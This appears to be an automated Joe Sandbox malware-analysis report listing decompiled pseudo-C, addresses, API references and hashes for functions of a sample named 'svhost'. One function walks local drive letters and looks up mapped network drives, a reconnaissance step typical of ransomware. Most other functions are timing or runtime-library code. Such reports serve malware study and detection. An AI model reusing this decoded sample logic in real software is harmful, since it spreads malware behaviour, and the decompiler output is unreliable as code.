                                      • Opcode Fuzzy Hash: e0eabd28da7c1277302979a5f0c05a25988bde8aba040217ed797935427e1489
                                      • Instruction Fuzzy Hash: ED415BB1C20118EBCB08EFA4EC51AEEB7B5FF54344F445569F802B7291EB34A909CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6C770 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E00E6C770(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _v20;
				char _v24;
				char _v36;
				char _v60;
				signed int _v64;
				signed int _v68;
				char _v70;
				char _v72;
				intOrPtr _v76;
				signed int _v80;
				char _v88;
				signed int _t39;
				signed int _t40;
				signed char _t54;
				signed int* _t60;
				void* _t64;
				void* _t66;
				void* _t95;
				void* _t96;
				signed int _t97;
				void* _t98;
				void* _t99;

				_t96 = __esi;
				_t95 = __edi;
				_t66 = __ebx;
				_push(0xffffffff);
				_push(0xec1760);
				_push( *[fs:0x0]);
				_t99 = _t98 - 0x48;
				_t39 =  *0xeef074; // 0x221cac15
				_t40 = _t39 ^ _t97;
				_v20 = _t40;
				_push(_t40);
				 *[fs:0x0] =  &_v16;
				_v76 = __ecx;
				E00E53840( &_v24, _v76);
				E00E515C0( &_v36, 0xc);
				E00E566A0( &_v36);
				_v80 = GetLogicalDrives();
				_v68 = 0;
				while(1) {
					_t101 = _v68 - 0x1a;
					if(_v68 >= 0x1a) {
						break;
					}
					_v64 = (_v68 & 0x0000ffff) + 0x41;
					E00E6C8B0(_t66,  &_v24, _t95, _t96, _t101,  &_v60, _v64 & 0x0000ffff);
					_t54 = E00E579A0( &_v60);
					_t91 = _t54 & 0x000000ff;
					if((_t54 & 0x000000ff) != 0) {
						_t103 = 0x00000001 << _v68 & _v80;
						if((0x00000001 << _v68 & _v80) == 0) {
							_v72 = _v64;
							_t60 = E00E51BB0( &_v88,  &_v72,  &_v70);
							_push(_t60[1]);
							_t91 =  *_t60;
							E00E66E90( &_v60, _t95, _t96, _t103,  *_t60);
							E00E66920( &_v60, L":\\");
							_t64 = E00E51650( &_v60);
							_t99 = _t99 + 4;
							E00E61E50( &_v36, _t64);
						}
					}
					E00E57B40( &_v60);
					_v68 = _v68 + 1;
				}
				E00E57460(_a4, E00E51650( &_v36));
				E00E578B0( &_v36);
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t97;
				return E00E89A35(_t66, _v20 ^ _t97, _t91, _t95, _t96);
			}


























                                      0x00e6c770
                                      0x00e6c770
                                      0x00e6c770
                                      0x00e6c773
                                      0x00e6c775
                                      0x00e6c780
                                      0x00e6c781
                                      0x00e6c784
                                      0x00e6c789
                                      0x00e6c78b
                                      0x00e6c78e
                                      0x00e6c792
                                      0x00e6c798
                                      0x00e6c7a2
                                      0x00e6c7ac
                                      0x00e6c7b4
                                      0x00e6c7bf
                                      0x00e6c7c2
                                      0x00e6c7d4
                                      0x00e6c7d4
                                      0x00e6c7d8
                                      0x00000000
                                      0x00000000
                                      0x00e6c7e5
                                      0x00e6c7f5
                                      0x00e6c7fd
                                      0x00e6c802
                                      0x00e6c807
                                      0x00e6c813
                                      0x00e6c816
                                      0x00e6c81c
                                      0x00e6c82b
                                      0x00e6c833
                                      0x00e6c834
                                      0x00e6c83a
                                      0x00e6c847
                                      0x00e6c850
                                      0x00e6c855
                                      0x00e6c85c
                                      0x00e6c85c
                                      0x00e6c816
                                      0x00e6c864
                                      0x00e6c7d1
                                      0x00e6c7d1
                                      0x00e6c87e
                                      0x00e6c886
                                      0x00e6c891
                                      0x00e6c89c
                                      0x00e6c8a6

                                      APIs
                                      • GetLogicalDrives.KERNEL32 ref: 00E6C7B9
                                        • Part of subcall function 00E6C8B0: WNetGetConnectionW.MPR(00EC0E50,00000000,00000000), ref: 00E6C92F
                                        • Part of subcall function 00E6C8B0: task.LIBCPMTD ref: 00E6C964
                                      • std::ios_base::good.LIBCPMTD ref: 00E6C7FD
                                      • _Smanip.LIBCPMTD ref: 00E6C82B
                                      • task.LIBCPMTD ref: 00E6C864
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$ConnectionDrivesLogicalSmanipstd::ios_base::good
                                      • String ID:
                                      • API String ID: 280476529-0
                                      • Opcode ID: 8bd4143eb50d88940f10e2f241a6c14827442e7aefec6dc0cdf9b0d7af0eb5c0
                                      • Instruction ID: 24c1107daa7696564d578e3aef6038611efd53974520ae0029b0e5441017537a
                                      • Opcode Fuzzy Hash: 8bd4143eb50d88940f10e2f241a6c14827442e7aefec6dc0cdf9b0d7af0eb5c0
                                      • Instruction Fuzzy Hash: 70313CB1C10118DBCB08EFA4EC51AEEB7B4FF54744F405529F80277291EB34AA09CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5F4E0 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID:
                                      • API String ID: 1333004437-0
                                      • Opcode ID: 7a4d0bbf632b63de7770933346468ce0da34ce020b4d22cc388b2f9c1d4a27d9
                                      • Instruction ID: e02f0d0a0a803afcdfe5e0ab8deb619dfa7d547ed469c2a1dda9200de5853218
                                      • Opcode Fuzzy Hash: 7a4d0bbf632b63de7770933346468ce0da34ce020b4d22cc388b2f9c1d4a27d9
                                      • Instruction Fuzzy Hash: EC41B8B4D00209AFCB04DF94D491AEEBBF5AF88341F14D56AE816BB351E730AA45CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5F660 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID:
                                      • API String ID: 1333004437-0
                                      • Opcode ID: 6c302b82ee613e93955777c8b02cdc8a70f21b5de212fd333485caac3266a188
                                      • Instruction ID: 90c5abc02159e1d50f40622daf152fd814041798737ee6302575faa8cb867834
                                      • Opcode Fuzzy Hash: 6c302b82ee613e93955777c8b02cdc8a70f21b5de212fd333485caac3266a188
                                      • Instruction Fuzzy Hash: 3541BBB4D00208AFCB04DF94D591AEEBBF5AF88341F14D56AE916BB350E730AA05CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5F7D0 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID:
                                      • API String ID: 1333004437-0
                                      • Opcode ID: 79a7841de103d1e86cd7c54491699b0b3544210ebe9022495da6d1fb9a3e187b
                                      • Instruction ID: e1925665ab2537e41326e1130db2ac23fd6feb1a732ac62fe67330386a571709
                                      • Opcode Fuzzy Hash: 79a7841de103d1e86cd7c54491699b0b3544210ebe9022495da6d1fb9a3e187b
                                      • Instruction Fuzzy Hash: 9E419B75D00209AFCB08DF94D491AEEBBF5AF88341F14D56AE816BB351D730AA45CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA5007 Relevance: 6.1, APIs: 4, Instructions: 83COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EA5007(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E00EB2838(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00EB2838(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E00EA5F21(GetLastError());
									_t17 =  *((intOrPtr*)(E00EA5F57(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00EA5122(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00EA5F21(GetLastError());
						_t17 =  *((intOrPtr*)(E00EA5F57(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00EA5122(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00EA51A7(_a8);
				return 0;
			}









                                      0x00ea500d
                                      0x00ea5012
                                      0x00ea5026
                                      0x00ea5029
                                      0x00ea505b
                                      0x00ea5063
                                      0x00ea5065
                                      0x00ea507e
                                      0x00ea5081
                                      0x00ea5084
                                      0x00ea5092
                                      0x00ea50a1
                                      0x00ea50a9
                                      0x00ea50ab
                                      0x00ea50c4
                                      0x00ea50c7
                                      0x00ea50c7
                                      0x00ea50ad
                                      0x00ea50b4
                                      0x00ea50bf
                                      0x00ea50bf
                                      0x00ea50c9
                                      0x00ea50ca
                                      0x00000000
                                      0x00ea50ca
                                      0x00ea5089
                                      0x00ea508e
                                      0x00ea5090
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea5090
                                      0x00ea506e
                                      0x00ea5079
                                      0x00000000
                                      0x00ea5079
                                      0x00ea502b
                                      0x00ea502e
                                      0x00ea5031
                                      0x00ea5044
                                      0x00ea5047
                                      0x00ea5049
                                      0x00ea504b
                                      0x00000000
                                      0x00ea504b
                                      0x00ea5037
                                      0x00ea503c
                                      0x00ea503e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea503e
                                      0x00ea5017
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b39929ea4f53b7aebd60b6be783c471590627bb7e7c9d08ba18d38311828155
                                      • Instruction ID: 5e90c777adc4df558c7b005e7d2de6e1f970b96f3b2d026bab430ac69a5cc8f9
                                      • Opcode Fuzzy Hash: 1b39929ea4f53b7aebd60b6be783c471590627bb7e7c9d08ba18d38311828155
                                      • Instruction Fuzzy Hash: C32183B3604A05AF9B206B619CC1D6B77ADEF1A3687109924F529BB150D731FC018BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E72059 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 56%
                                      			E00E72059(void* __ebx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t49;
				intOrPtr _t51;
				intOrPtr _t60;
				signed int _t62;

				_t58 = __edx;
				_t22 =  *0xeef074; // 0x221cac15
				_v8 = _t22 ^ _t62;
				_t60 = _a12;
				_t59 = _a8;
				_v28 = _a4;
				_v36 = _t60;
				_v32 = E00E60C40(_a8);
				_pop(_t49);
				if(_t60 != 0) {
					E00E72399(_t49, __edx,  &_v24, 1);
					E00E71E3F(_t59);
					_t61 =  *((intOrPtr*)( *_v28 + 4));
					 *0xec4320(_v32, E00E7227F(_v36,  &_v24));
					_t51 = _v28;
					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4))))() == 0) {
						E00E72399(_t51, _t58,  &_v24, 1);
						if(E00E7227F(_v36,  &_v24) == 0) {
							_push(2);
							_pop(0);
						}
					}
				} else {
					E00E71E3F(_t59);
					_t61 =  *((intOrPtr*)( *_v28));
					 *0xec4320(_v32);
					 *((intOrPtr*)( *((intOrPtr*)( *_v28))))();
				}
				E00E71EC0(_t59);
				return E00E89A35(0, _v8 ^ _t62, _t58, _t59, _t61);
			}















                                      0x00e72059
                                      0x00e7205f
                                      0x00e72066
                                      0x00e7206e
                                      0x00e72074
                                      0x00e72078
                                      0x00e7207b
                                      0x00e72083
                                      0x00e72086
                                      0x00e72089
                                      0x00e720b1
                                      0x00e720b7
                                      0x00e720c1
                                      0x00e720d9
                                      0x00e720df
                                      0x00e720e6
                                      0x00e720ee
                                      0x00e72104
                                      0x00e72106
                                      0x00e72108
                                      0x00e72108
                                      0x00e72104
                                      0x00e7208b
                                      0x00e7208c
                                      0x00e7209a
                                      0x00e7209e
                                      0x00e720a7
                                      0x00e720a7
                                      0x00e7210a
                                      0x00e72120

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                      • String ID:
                                      • API String ID: 531285432-0
                                      • Opcode ID: 173b7a2bce3500428906489bf65de314a3215b21f3dcd2f600f7a9bed3621a5c
                                      • Instruction ID: 93f93ccf31bba36d64d7bfc770a6ad2dcd270df5217154e4200e61d5202b1231
                                      • Opcode Fuzzy Hash: 173b7a2bce3500428906489bf65de314a3215b21f3dcd2f600f7a9bed3621a5c
                                      • Instruction Fuzzy Hash: 8A217175900209AFDF10EF98DC419BEB7B9EF08714F404059FA04B7251D6349D058B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E51820 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E00E51820(void* __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v64;
				signed int _t31;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;

				_t59 = __edx;
				_push(0xffffffff);
				_push(0xebfd50);
				_push( *[fs:0x0]);
				_t31 =  *0xeef074; // 0x221cac15
				_push(_t31 ^ _t64);
				 *[fs:0x0] =  &_v16;
				_v24 = E00E72268(__ecx);
				_v20 = _t59;
				_v32 = E00E72251(__ecx);
				_v28 = _t59;
				_t60 = _v28;
				_v40 = E00E8A5E0(E00EBF380(_v32, _t60, _v24, _v20), _t60, 0x3b9aca00, 0);
				_v36 = _t60;
				_t61 = _v24;
				_v48 = E00EBF380(E00E8A5E0(E00EBF430(_v32, _v28, _t61, _v20), _t61, 0x3b9aca00, 0), _t61, _v24, _v20);
				_v44 = _t61;
				asm("adc eax, [ebp-0x28]");
				_v56 = _v40 + _v48;
				_v52 = _v36;
				E00E57870(_a4, E00E51900( &_v64,  &_v56));
				 *[fs:0x0] = _v16;
				return _a4;
			}




















                                      0x00e51820
                                      0x00e51823
                                      0x00e51825
                                      0x00e51830
                                      0x00e51834
                                      0x00e5183b
                                      0x00e5183f
                                      0x00e5184a
                                      0x00e5184d
                                      0x00e51855
                                      0x00e51858
                                      0x00e51863
                                      0x00e5187e
                                      0x00e51881
                                      0x00e51888
                                      0x00e518b6
                                      0x00e518b9
                                      0x00e518c5
                                      0x00e518c8
                                      0x00e518cb
                                      0x00e518de
                                      0x00e518e9
                                      0x00e518f4

                                      APIs
                                        • Part of subcall function 00E72268: QueryPerformanceFrequency.KERNEL32(00E5184A,?,?,?,00E5184A,221CAC15), ref: 00E72271
                                        • Part of subcall function 00E72251: QueryPerformanceCounter.KERNEL32(00E51855,?,?,?,00E51855,221CAC15), ref: 00E7225A
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5186B
                                      • __allrem.LIBCMT ref: 00E51894
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E518B1
                                      • DName::DName.LIBCMTD ref: 00E518D5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$CounterFrequencyNameName::__allrem
                                      • String ID:
                                      • API String ID: 2520107669-0
                                      • Opcode ID: b78e50651bf1bd0011797a35dfcd906cd46535880089f27955be9c7c2687234a
                                      • Instruction ID: 23126772ec8a99193b503b6d3903b596f6bc41221ba96a9263c0b0c3e2637fa4
                                      • Opcode Fuzzy Hash: b78e50651bf1bd0011797a35dfcd906cd46535880089f27955be9c7c2687234a
                                      • Instruction Fuzzy Hash: ED2198B1D00609ABCB04DFE9DD81EEFB7F9AB88700F109629F519B7251D634A9008B64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB0EFC Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E00EB0EFC(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xeef2c0; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00EB163C(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00EB04C2(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00EB163C(__eflags,  *0xeef2c0, _t51);
							if(__eflags != 0) {
								E00EB0D2A(_t51, 0xef373c);
								E00EB051F(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00EB163C(__eflags,  *0xeef2c0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00EB163C(0,  *0xeef2c0, 0);
							_push(0);
							L9:
							E00EB051F();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00EB15FD(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xeef2c0; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00EA59A0(_t39, _t43, _t49, _t60);
					asm("int3");
					asm("int3");
					_t5 =  *0xeef2c0; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00EB163C(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00EB04C2(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00EB163C(__eflags,  *0xeef2c0, _t60);
								if(__eflags != 0) {
									E00EB0D2A(_t60, 0xef373c);
									E00EB051F(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00EB163C(__eflags,  *0xeef2c0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00EB163C(__eflags,  *0xeef2c0, _t20);
								_push(_t60);
								L25:
								E00EB051F();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00EB15FD(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xeef2c0; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00EA59A0(_t39, _t43, _t49, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xeef2c0; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00EB163C(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00EB04C2(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00EB163C(__eflags,  *0xeef2c0, _t54);
											if(__eflags != 0) {
												E00EB0D2A(_t54, 0xef373c);
												E00EB051F(0);
												goto L45;
											} else {
												_t40 = 0;
												E00EB163C(__eflags,  *0xeef2c0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00EB163C(0,  *0xeef2c0, 0);
											_push(0);
											L41:
											E00EB051F();
											goto L36;
										}
									}
								} else {
									_t54 = E00EB15FD(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xeef2c0; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}






















                                      0x00eb0efc
                                      0x00eb0efc
                                      0x00eb0f07
                                      0x00eb0f09
                                      0x00eb0f0e
                                      0x00eb0f11
                                      0x00eb0f2f
                                      0x00eb0f32
                                      0x00eb0f37
                                      0x00eb0f39
                                      0x00000000
                                      0x00eb0f3b
                                      0x00eb0f47
                                      0x00eb0f4a
                                      0x00eb0f4b
                                      0x00eb0f4d
                                      0x00eb0f72
                                      0x00eb0f74
                                      0x00eb0f8d
                                      0x00eb0f94
                                      0x00eb0f99
                                      0x00000000
                                      0x00eb0f76
                                      0x00eb0f76
                                      0x00eb0f7f
                                      0x00eb0f84
                                      0x00000000
                                      0x00eb0f84
                                      0x00eb0f4f
                                      0x00eb0f4f
                                      0x00eb0f4f
                                      0x00eb0f58
                                      0x00eb0f5d
                                      0x00eb0f5e
                                      0x00eb0f5e
                                      0x00eb0f63
                                      0x00000000
                                      0x00eb0f63
                                      0x00eb0f4d
